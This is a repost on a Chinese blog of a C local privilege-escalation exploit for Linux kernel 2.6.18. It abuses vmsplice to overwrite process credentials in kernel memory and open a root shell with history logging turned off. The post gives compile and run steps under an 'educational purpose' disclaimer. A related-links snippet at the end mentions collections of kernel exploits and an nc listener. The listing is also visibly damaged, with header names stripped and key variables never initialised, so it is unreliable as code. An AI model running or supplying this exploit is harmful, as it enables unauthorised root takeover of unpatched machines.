linux 2.6.18 exp,LINUX 2.6.18-238 local root exp

于 2021-05-28 20:46:24 发布
阅读量94 收藏
点赞数
文章标签: linux 2.6.18 exp

/*

*

*

* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

* 0 _ __ __ __ 1

* 1 /” \ __ /”__`\ /\ \__ /”__`\ 0

* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1

* 1 \/_/\ \ /” _ `\ \/\ \/_/_\_<_>

* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1

* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0

* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1

* 1 \ \____/ >> Exploit database separated by exploit 0

* 0 \/___/ type (local, remote, DoS, etc.) 1

* 1 0

* 0 2.6.18 Modified By CrosS 1

* 1 0

* 0 Linux 2011 1

* 1 0

* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

*

* Linux 2.6.18 Previously Coded by “Angel Injection” , couple of thanks for this, but

*

* it had errors while compiling, so this is modified version of this exploit

*

* working fine . Usage is given below..

*

* gcc -o exploit exploit.c

* chmod 777 exploit

* ./exploit

*

* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of

1337day Team ) ….. & all members of r00tw0rm.com ( RW ) .. )

*

* Submit Your Exploit at [email protected] | [email protected]

*

* For Educational purpose Only))

*/

#define _GNU_SOURCE

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define __KERNEL__

#include

#define PIPE_BUFFERS 16

#define PG_compound 14

#define uint unsigned int

#define static_inline static inline __attribute__((always_inline))

#define STACK(x) (x + sizeof(x) – 40)

struct page {

unsigned long flags;

int count;

int mapcount;

unsigned long private;

void *mapping;

unsigned long index;

struct { long next, prev; } lru;

};

void exit_code();

char exit_stack[1024 * 1024];

void die(char *msg, int err)

{

printf(err ? “[-] %s: %s\n” : “[-] %s\n”, msg, strerror(err));

fflush(stdout);

fflush(stderr);

exit(1);

}

#if defined (__i386__)

#ifndef __NR_vmsplice

#define __NR_vmsplice 316

#endif

#define USER_CS 0x73

#define USER_SS 0x7b

#define USER_FL 0x246

static_inline

void exit_kernel()

{

__asm__ __volatile__ (

“movl %0, 0x10(%%esp) ;”

“movl %1, 0x0c(%%esp) ;”

“movl %2, 0x08(%%esp) ;”

“movl %3, 0x04(%%esp) ;”

“movl %4, 0x00(%%esp) ;”

“iret”

: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),

“i” (USER_CS), “r” (exit_code)

);

}

static_inline

void * get_current()

{

unsigned long curr;

__asm__ __volatile__ (

“movl %%esp, %%eax ;”

“andl %1, %%eax ;”

“movl (%%eax), %0″

: “=r” (curr)

: “i” (~8191)

);

return (void *) curr;

}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice

#define __NR_vmsplice 278

#endif

#define USER_CS 0x23

#define USER_SS 0x2b

#define USER_FL 0x246

static_inline

void exit_kernel()

{

__asm__ __volatile__ (

“swapgs ;”

“movq %0, 0x20(%%rsp) ;”

“movq %1, 0x18(%%rsp) ;”

“movq %2, 0x10(%%rsp) ;”

“movq %3, 0x08(%%rsp) ;”

“movq %4, 0x00(%%rsp) ;”

“iretq”

: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),

“i” (USER_CS), “r” (exit_code)

);

}

static_inline

void * get_current()

{

unsigned long curr;

__asm__ __volatile__ (

“movq %%gs:(0), %0″

: “=r” (curr)

);

return (void *) curr;

}

#else

#error “unsupported arch”

#endif

#if defined (_syscall4)

#define __NR__vmsplice __NR_vmsplice

_syscall4(

long, _vmsplice,

int, fd,

struct iovec *, iov,

unsigned long, nr_segs,

unsigned int, flags)

#else

#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))

#endif

static uint uid, gid;

void kernel_code()

{

int i;

uint *p = get_current();

for (i = 0; i < 1024-13; i++) {

if (p[0] == uid && p[1] == uid &&

p[2] == uid && p[3] == uid &&

p[4] == gid && p[5] == gid &&

p[6] == gid && p[7] == gid) {

p[0] = p[1] = p[2] = p[3] = 0;

p[4] = p[5] = p[6] = p[7] = 0;

p = (uint *) ((char *)(p + 8) + sizeof(void *));

p[0] = p[1] = p[2] = ~0;

break;

}

p++;

}

exit_kernel();

}

void exit_code()

{

if (getuid() != 0)

die("wtf", 0);

printf("[+] root\n");

putenv("HISTFILE=/dev/null");

execl("/bin/bash", "bash", "-i", NULL);

die("/bin/bash", errno);

}

int main(int argc, char *argv[])

{

int pi[2];

size_t map_size;

char * map_addr;

struct iovec iov;

struct page * pages[5];

uid = getuid();

gid = getgid();

setresuid(uid, uid, uid);

setresgid(gid, gid, gid);

if (!uid || !gid)

die("!@#$", 0);

/*****/

pages[1] = pages[0] + 1;

map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);

printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

printf("[+] page: 0x%lx\n", pages[0]);

printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;

pages[0]->private = (unsigned long) pages[0];

pages[0]->count = 1;

pages[1]->lru.next = (long) kernel_code;

/*****/

pages[2] = *(void **) pages[0];

pages[3] = pages[2] + 1;

map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die(“mmap”, errno);

memset(map_addr, 0, map_size);

printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);

printf(“[+] page: 0x%lx\n”, pages[2]);

printf(“[+] page: 0x%lx\n”, pages[3]);

pages[2]->flags = 1 << PG_compound;

pages[2]->private = (unsigned long) pages[2];

pages[2]->count = 1;

pages[3]->lru.next = (long) kernel_code;

/*****/

map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die(“mmap”, errno);

memset(map_addr, 0, map_size);

printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);

printf(“[+] page: 0x%lx\n”, pages[4]);

/*****/

map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,

MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die(“mmap”, errno);

memset(map_addr, 0, map_size);

printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);

/*****/

if (pipe(pi) < 0) die("pipe", errno);

close(pi[0]);

iov.iov_base = map_addr;

iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);

_vmsplice(pi[1], &iov, 1, 0);

die("vmsplice", errno);

return 0;

}

原文:http://www.cnblogs.com/hookjoy/p/4131881.html

猩蕉硕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux内核2.6.18升级至2.6.26
xiejin007的博客
04-27 383
原创作者:运维工程师 谢晋 linux内核2.6.18升级至2.6.26内核升级 内核升级 该台系统内核为2.6.18,无法安装虚拟化性能优化工具,故要升级为2.6.26 将2.6.26的升级包上传至系统的usr/src目录下 连接到该台服务器,输入cd /usr/src到此目录下,输入ls命令查看2.6.26包是否存在 # cd /usr/src # ls 输入tar -xvf linux-2.6.26.tar.gz解压该压缩包 # tar -xvf linux-2.6.2
Linux下查看系统版本号信息的方法
haoren001的专栏
02-18 703
一、查看Linux内核版本命令(两种方法): 1、cat /proc/version [root@localhost ~]# cat /proc/version Linux version 2.6.18-194.8.1.el5.centos.plus ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Wed Jul 7 11:50:45 EDT 2010 ...
ubuntu 下 linux 2.6.18.tar.gz 内核编译,linux内核系列(一)编译安装Linux内核 2.6.18
weixin_35940071的博客
05-02 296
1、配置环境操作系统:CentOS 5.2下载linux-2.6.18版本的内核,网址:http://www.kernel.org说明:该编译文档适合2.6.18以上的Linux内核版本,只需所编译的 Linux内核版本不能低于Linux操作系统自身的内核版本,不然会遇到很多问题;2、开始编译cp ./ linux-2.6.18.tar.gz /usr/src/tar –zxvf ./linu...
Linux2.6所有内核下载地址
热门推荐
Skylar
04-17 3万+
http://www.kernel.org/pub/linux/kernel/v2.6/ Index of /pub/linux/kernel/v2.6 Name Last modified Size Parent Directory - incr/
linux2.6.18源码
03-31
Linux is a clone of the operating system Unix, written from scratch by Linus Torvalds with assistance from a loosely-knit team of hackers across the Net. It aims towards POSIX and Single UNIX Specification compliance. It has all the features you would expect in a modern fully-fledged Unix, including true multitasking, virtual memory, shared libraries, demand loading, shared copy-on-write executables, proper memory management, and multistack networking including IPv4 and IPv6. It is distributed under the GNU General Public License - see the accompanying COPYING file for more details.
LocalRoot-2.6.18 exp
10-04
LocalRoot-2.6.18 exp
Linux2.6.18 SD卡驱动的修正
08-18
Linux2.6.18 SD卡驱动的修正步骤。
linux-2.6.18:linux-2.6.18源代码
03-23
linux-2.6.18 linux-2.6.18源代码
linux-2.6.18.tar.bz2
04-25
linux-2.6.18.tar.bz2
简单的linux提权收集的N多linux内核exp
03-12
然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢? 因为tmp目录可写可执行一般,继续ing. 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p ...
linux-2.6.18内核基础上分析网络协议栈,适合初学者看
12-11
linux-2.6.18内核基础上分析网络协议栈,适合初学者看
内存脏数据下刷(linux2.6.18/linux.2.6.32)剖析
TaLk工作室专栏 - Trace the linux kernel
06-17 4243
1   前言 BDI机制原本主要是用于检测磁盘的繁忙程度等作用,从2.6.19内核开始,将此部分功能整合到了mm/backing_dev.c中,一直到2.6.31内核为止,其功能也只是在不段的完善,但是脏数据的下刷依然是依靠pdflush。自2.6.32内核开始,彻底取消了pdflush,而是将此部分功能添加到BDI机制中,并且是为每个设备创建了一个名为“flush-设备主次设备号”的线程,用于
linux内核功能有,好消息!LINUX内核2.6.18终于支持实时功能了
weixin_29061997的博客
04-29 189
LINUX内核2.6.18终于支持实时功能了,这是个好消息。当LINUX实时功能加强后,它在嵌入式系统的应用就会更广泛了。在这一版发布前,为了使嵌入式系统的LINUX具有实时特性,需要给标准和LINUX系统加上具有实时功能的补丁。实际上,就算是具有实时特性的LINUX内核已经发布了,嵌入式系统的应用还是要滞后一段时间吧。想从网上多找一些有关LINUX内核2.6.18及实时特征的资料,却发现现在的互...
Linux内核从2.6.18升级到2.6.28(最新)全过程
zccst的专栏
09-02 7104
Linux内核从2.6.18升级到2.6.28(最新)全过程作者:zccst 前面的话为了支持虚拟化,需要先升级内核至2.6.20以后,在网上找到了一篇从2.4.X升级到2.6.X的经典文章,讲解的很详细,可是,我看完后还是吓了一跳:太复杂了。幸好,前人们不断改进,才使得从2.6.18升级到2.6.28(最新)变得如此简单。科技的力量就是这样,把原本复杂的事情变得简单,向那些默默的
Linux2.6.18内核编译
diansegang3317的博客
11-07 211
一.环境 虚拟机:VMware Workstation6.5 操作系统:CRUX2.2 编译内核:linux-2.6.18 文件互传:iso镜像挂载 二.正文 1.  安装CRUX2.2 1.1 下载CRUX2.2的ISO镜像:http://crux.nu/Main/Download 1.2 创建linux2.6x内核的虚拟机,将硬盘设置为IDE格式 1.3 创建分区,...
linux系统9.0内核版本,把Linux9.0的内核升级为2.6.18
weixin_34982884的博客
05-02 208
昨天终于把Linux9.0的内核升级到了2.6.18,虽然过程很漫长,并碰到了很多问题,但最终还是解决了。由于要开发Linux2.6内核下设备驱动程序,于是在网上下载了RedHat AS4,用Virtual PC中装了,但是装完之后启动发现,这个版本的Redhat启动后占了CPU近100%,搞的根本就干不了别的事情。先前我在Virtual PC中已经装了Redhat9.0,其启动之后虚拟机只占不到...
xr_usb_serial_common_lnx-2.6.18-to-3.4-pak
最新发布
05-12
xr_usb_serial_common_lnx-2.6.18-to-3.4-pak是一个Linux操作系统下的驱动程序包,旨在将2.6.18版本的Linux内核升级到3.4版本及以上的内核版本。该驱动程序包主要应用于物联网(IoT)设备和嵌入式系统中,使用USB...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值